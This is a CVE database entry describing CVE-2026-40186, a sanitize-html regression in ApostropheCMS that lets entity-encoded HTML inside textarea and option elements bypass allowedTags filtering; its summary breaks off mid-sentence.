cvedb.io
CVE-2026-40186
MEDIUM · CVSS 6.1
EPSS exploitation probability: 0%
Published 2026-04-15T21:17:27.523 · Last modified 2026-06-17T10:44:50.393

Summary

ApostropheCMS is an open-source Node.js content management system. A regression introduced in commit 49d0bb7, included in versions 2.17.1 of the ApostropheCMS-maintained sanitize-html package bypasses allowedTags enforcement for text inside nonTextTagsArray elements (textarea and option). ApostropheCMS version 4.28.0 is affected through its dependency on the vulnerable sanitize-html version. The code at packages/sanitize-html/index.js:569-573 incorrectly assumes that htmlparser2 does not decode entities inside these elements and skips escaping, but htmlparser2 10.x does decode entities before passing text to the ontext callback. As a result, entity-encoded HTML is decoded by the parser and then written directly to the output as literal HTML characters, completely bypassing the allowedTags

Affected products

apostrophecms — apostrophecms

Does this affect you?

Add your gear to cvedb and we'll alert you only when apostrophecms ships something exploited.

Check my exposure →

References

This product uses data from the NVD API but is not endorsed or certified by the NVD. Informational only; not professional security advice.